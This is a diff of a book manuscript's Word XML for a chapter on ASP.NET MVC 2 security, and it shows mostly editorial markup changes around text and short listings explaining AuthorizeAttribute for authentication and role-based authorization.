--- a/manuscript/Chapter11/MVC2iA_CH_11.docx
+++ b/manuscript/Chapter11/MVC2iA_CH_11.docx
@@ -1,6 +1,6 @@
 
 <file path=word/document.xml><?xml version="1.0" encoding="utf-8"?>
-<w:document xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
+<w:document xmlns:mo="http://schemas.microsoft.com/office/mac/office/2008/main" xmlns:ve="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:mv="urn:schemas-microsoft-com:mac:vml" xmlns:o="urn:schemas-microsoft-com:office:office" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:m="http://schemas.openxmlformats.org/officeDocument/2006/math" xmlns:v="urn:schemas-microsoft-com:vml" xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" xmlns:w10="urn:schemas-microsoft-com:office:word" xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" xmlns:wne="http://schemas.microsoft.com/office/word/2006/wordml">
   <w:body>
     <w:p>
       <w:pPr>
@@ -23,7 +23,10 @@
         <w:pStyle w:val="Body"/>
       </w:pPr>
       <w:r>
-        <w:t>This Chapter covers</w:t>
+        <w:t>This c</w:t>
+      </w:r>
+      <w:r>
+        <w:t>hapter covers</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -38,6 +41,7 @@
       <w:pPr>
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
+      <w:commentRangeStart w:id="0"/>
       <w:r>
         <w:t>Mitigating Cross Site Scripting attacks</w:t>
       </w:r>
@@ -58,16 +62,33 @@
         <w:t>Mitigating JSON Hijacking</w:t>
       </w:r>
     </w:p>
+    <w:commentRangeEnd w:id="0"/>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="0"/>
+      </w:r>
+      <w:commentRangeStart w:id="1"/>
+      <w:r>
         <w:t xml:space="preserve">Security is an important topic for </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">developers.  </w:t>
       </w:r>
+      <w:commentRangeEnd w:id="1"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="1"/>
+      </w:r>
       <w:r>
         <w:t xml:space="preserve">We'll cover two aspects.  The first is traditional management of authentication and authorization. </w:t>
       </w:r>
@@ -78,7 +99,22 @@
         <w:t>Authentication</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> is ensuring the the user has supplied the proper credentials to access the system.  When a user logs in, usually by providing a username and password, it is authenticated.  </w:t>
+        <w:t xml:space="preserve"> is ensuring that</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> the user has supplied the proper credentials to access the system.  When a user logs in, usually by providing a username and password, </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="2"/>
+      <w:r>
+        <w:t xml:space="preserve">it is authenticated.  </w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="2"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="2"/>
       </w:r>
       <w:r>
         <w:rPr>
@@ -87,7 +123,19 @@
         <w:t>Authorization</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> is making a decision about whether a given user has permission to do something with the system.  When a user accesses a resource not available to other users, it has been specifically authorized to do so.</w:t>
+        <w:t xml:space="preserve"> is making a decision about whether a given user has permission to do something with the system.  When a user accesses a resource not available to other users</w:t>
+      </w:r>
+      <w:commentRangeStart w:id="3"/>
+      <w:r>
+        <w:t>, it has been specifically authorized to do so.</w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="3"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="3"/>
       </w:r>
     </w:p>
     <w:p>
@@ -95,7 +143,21 @@
         <w:pStyle w:val="Body"/>
       </w:pPr>
       <w:r>
-        <w:t>The second aspect we'll discuss involve common web attack vectors and technical vulnerabilities that allow attackers to bypass authentication or authorization.  There are several attack vectors, but we'll focus on some common ones: cross-site scripting (XSS), cross-site request forgery (CSRF), and a special cross-site request forgery called JSON hijacking.</w:t>
+        <w:t>The second aspect we'll discuss involve</w:t>
+      </w:r>
+      <w:r>
+        <w:t>s</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> common web attack vectors and technical vulnerabilities that allow attackers to bypass authentication or authorization.  There </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>are</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> several attack vectors, but we'll focus on some common ones: cross-site scripting (XSS), cross-site request forgery (CSRF), and a special cross-site request forgery called JSON hijacking.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -119,33 +181,47 @@
       <w:r>
         <w:t xml:space="preserve">ASP.NET MVC 2 ships with a filter attribute </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> that provides out of the box authentication and authorization.  Developers can apply the attribute to actions to restrict access to them.</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> that provides out of the box authentication and authorization.  Developers can apply the attribute to actions to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>restrict</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> access to them.</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">  </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> short-circuits the normal response.  If the user is not permitted, </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> will transmit to the browser an HTTP status code of </w:t>
       </w:r>
@@ -174,18 +250,27 @@
         <w:t xml:space="preserve">.  </w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve">Applications using ASP.NET's forms authentication mechanism </w:t>
+        <w:t xml:space="preserve">Applications using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ASP.NET's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> forms authentication mechanism </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">and with a login page specified in </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t>Web.config</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> </w:t>
       </w:r>
@@ -198,16 +283,34 @@
         <w:pStyle w:val="Head2"/>
       </w:pPr>
       <w:r>
-        <w:t>11.1.1 Requiring authentication with AuthorizeAttribute</w:t>
-      </w:r>
+        <w:t xml:space="preserve">11.1.1 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Requiring</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> authentication with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:pStyle w:val="Body"/>
       </w:pPr>
       <w:r>
-        <w:t>The simplest use of the AuthorizeAttribute</w:t>
-      </w:r>
+        <w:t xml:space="preserve">The simplest use of the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>, shown in listing 11.1,</w:t>
       </w:r>
@@ -226,8 +329,13 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t>Listing 11.1 Authentication with the AuthorizeAttribute</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Listing 11.1 Authentication with the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -244,8 +352,21 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:r>
-        <w:t>public ActionResult About()</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ActionResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> About()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -262,7 +383,14 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>return View();</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>return</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> View();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -278,7 +406,23 @@
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
       <w:r>
-        <w:t>#1 AuthorizeAttribute applied to About action</w:t>
+        <w:t xml:space="preserve">#1 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> applied to </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>About</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> action</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -286,14 +430,24 @@
         <w:pStyle w:val="Body1"/>
       </w:pPr>
       <w:r>
-        <w:t xml:space="preserve">When this action is requested by an unauthenticated user, the </w:t>
-      </w:r>
+        <w:t xml:space="preserve">When </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>this action is requested by an unauthenticated user</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">, the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> will prevent access to it.</w:t>
       </w:r>
@@ -303,8 +457,21 @@
         <w:pStyle w:val="Head2"/>
       </w:pPr>
       <w:r>
-        <w:t>11.1.2 Requiring authorization with AuthorizeAttribute</w:t>
-      </w:r>
+        <w:t xml:space="preserve">11.1.2 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Requiring</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> authorization with </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -316,14 +483,36 @@
       <w:r>
         <w:t xml:space="preserve">n action further, developers can specify users or roles that the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve"> requires. These roles or users are passed to the attribute using a comma-delimited list of strings - either the usernames or the roles allowed. Listing 11.2 shows the AuthorizeAttribute syntax for requiring a specific user.</w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> requires. These roles or users are passed to the attribute using a comma-delimited list of strings - either the usernames or the roles allowed. Listing 11.2 shows the </w:t>
+      </w:r>
+      <w:commentRangeStart w:id="4"/>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:commentRangeEnd w:id="4"/>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="CommentReference"/>
+          <w:vanish/>
+        </w:rPr>
+        <w:commentReference w:id="4"/>
+      </w:r>
+      <w:r>
+        <w:t>syntax for requiring a specific user.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -331,15 +520,28 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t>Listing 11.2 User authorization with the AuthorizeAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[Authorize(Users = "admin")]</w:t>
+        <w:t xml:space="preserve">Listing 11.2 User authorization with the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Authorize(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>Users = "admin")]</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">  #1</w:t>
@@ -349,8 +551,29 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:r>
-        <w:t>public ActionResult Admins()</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ActionResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Admins</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -367,7 +590,14 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>return View();</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>return</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> View();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -390,8 +620,29 @@
       <w:pPr>
         <w:pStyle w:val="Body1"/>
       </w:pPr>
-      <w:r>
-        <w:t>Hardcoding a username like this may be too tightly controlling.  Users come and go and the duties of a given user may change during their time using the application.  Instead of requiring a specific user it usually makes sense to require a role.  Listing 11.3 demonstrates how develoeprs can use the AuthorizeAttribute to restrict an action to certain roles.</w:t>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>Hardcoding</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> a username like this may be too tightly controlling.  Users come and go and the duties of a given user may change during their time using the application.  Instead of requiring a specific user it usually makes sense to require a role.  Listing 11.3 demonstrates how </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>develoeprs</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> can use the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> to restrict an action to certain roles.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -399,15 +650,36 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t>Listing 11.3 Role authorization with the AuthorizeAttribute</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>[Authorize(Roles = "admins, developers")]</w:t>
+        <w:t xml:space="preserve">Listing 11.3 Role authorization with the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:r>
+        <w:t>[</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Authorize(</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t>Roles = "</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>admins</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>, developers")]</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">  #1</w:t>
@@ -417,8 +689,21 @@
       <w:pPr>
         <w:pStyle w:val="Code"/>
       </w:pPr>
-      <w:r>
-        <w:t>public ActionResult Developers()</w:t>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ActionResult</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> Developers()</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -435,7 +720,14 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>return View();</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>return</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> View();</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -451,7 +743,15 @@
         <w:pStyle w:val="CodeAnnotation"/>
       </w:pPr>
       <w:r>
-        <w:t>#1 Multiple roles are comma delimited</w:t>
+        <w:t xml:space="preserve">#1 </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>Multiple</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> roles are comma delimited</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -470,21 +770,25 @@
       <w:r>
         <w:t xml:space="preserve"> action will only be allowed to users in the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>admins</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> or </w:t>
       </w:r>
+      <w:proofErr w:type="gramStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>developers</w:t>
       </w:r>
+      <w:proofErr w:type="gramEnd"/>
       <w:r>
         <w:t xml:space="preserve"> roles - all other users (authenticated or not) will be issued a </w:t>
       </w:r>
@@ -495,14 +799,24 @@
         <w:t>401</w:t>
       </w:r>
       <w:r>
-        <w:t xml:space="preserve"> response code and using ASP.NET's forms authentication, redirected to the login page. Now that we've seen a few examples of how the </w:t>
-      </w:r>
+        <w:t xml:space="preserve"> response code and using </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>ASP.NET's</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> forms authentication, redirected to the login page. Now that we've seen a few examples of how the </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> is used, let's talk about how it works.</w:t>
       </w:r>
@@ -512,35 +826,48 @@
         <w:pStyle w:val="Head2"/>
       </w:pPr>
       <w:r>
-        <w:lastRenderedPageBreak/>
-        <w:t>11.1.3 AuthorizeAttribute - how it works</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
+        <w:t xml:space="preserve">11.1.3 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>AuthorizeAttribute</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> - how it works</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> checks the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>IPrincipal</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> associated with the current </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>HttpContext</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve">. When </w:t>
       </w:r>
@@ -562,6 +889,7 @@
       <w:r>
         <w:t xml:space="preserve"> is specified, it ensures the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
@@ -569,7 +897,11 @@
         <w:t>IPrincipal</w:t>
       </w:r>
       <w:r>
-        <w:t>'s username is in the allowed usernames, or a member of one of the granted roles.</w:t>
+        <w:t>'s</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> username is in the allowed usernames, or a member of one of the granted roles.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -579,12 +911,14 @@
       <w:r>
         <w:t xml:space="preserve">If </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> is applied to a controller, it is applied to every action in that controller.</w:t>
       </w:r>
@@ -596,12 +930,14 @@
       <w:r>
         <w:t xml:space="preserve">If multiple </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthrorizeAttributes</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> are applied to an action, all checks occur and the user must be authorized by all of them.</w:t>
       </w:r>
@@ -610,33 +946,47 @@
       <w:pPr>
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> implements a special interface called </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>IAuthorizationFilter</w:t>
       </w:r>
-      <w:r>
-        <w:t xml:space="preserve">.  When applied to an action, IAuthorizationFilter will execute before any other action filters, and of course before the normal result. </w:t>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve">.  When applied to an action, </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>IAuthorizationFilter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> will execute before any other action filters, and of course before the normal result. </w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">Listing 11.4 shows the declaration of </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>IAuthorizationFilter</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t>.</w:t>
       </w:r>
@@ -646,16 +996,31 @@
         <w:pStyle w:val="CodeListingCaption"/>
       </w:pPr>
       <w:r>
-        <w:t>Listing 11.4 IAuthorizationFilter</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Code"/>
-      </w:pPr>
-      <w:r>
-        <w:t>public interface IAuthorizationFilter</w:t>
-      </w:r>
+        <w:t xml:space="preserve">Listing 11.4 </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>IAuthorizationFilter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Code"/>
+      </w:pPr>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>public</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> interface </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>IAuthorizationFilter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
@@ -671,7 +1036,38 @@
       </w:pPr>
       <w:r>
         <w:tab/>
-        <w:t>void OnAuthorization(AuthorizationContext filterContext);</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:t>void</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>OnAuthorization</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>(</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>AuthorizationContext</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:t>filterContext</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:t>);</w:t>
       </w:r>
       <w:r>
         <w:t xml:space="preserve">   #1</w:t>
@@ -697,27 +1093,32 @@
       <w:pPr>
         <w:pStyle w:val="ListBullet"/>
       </w:pPr>
+      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rStyle w:val="CodeinText"/>
         </w:rPr>
         <w:t>AuthorizeAttribute</w:t>
       </w:r>
+      <w:proofErr w:type="spellEnd"/>
       <w:r>
         <w:t xml:space="preserve"> does its security check in the </w:t>
       </w:r>
+      <w:proofErr w:type="spellStart"/>
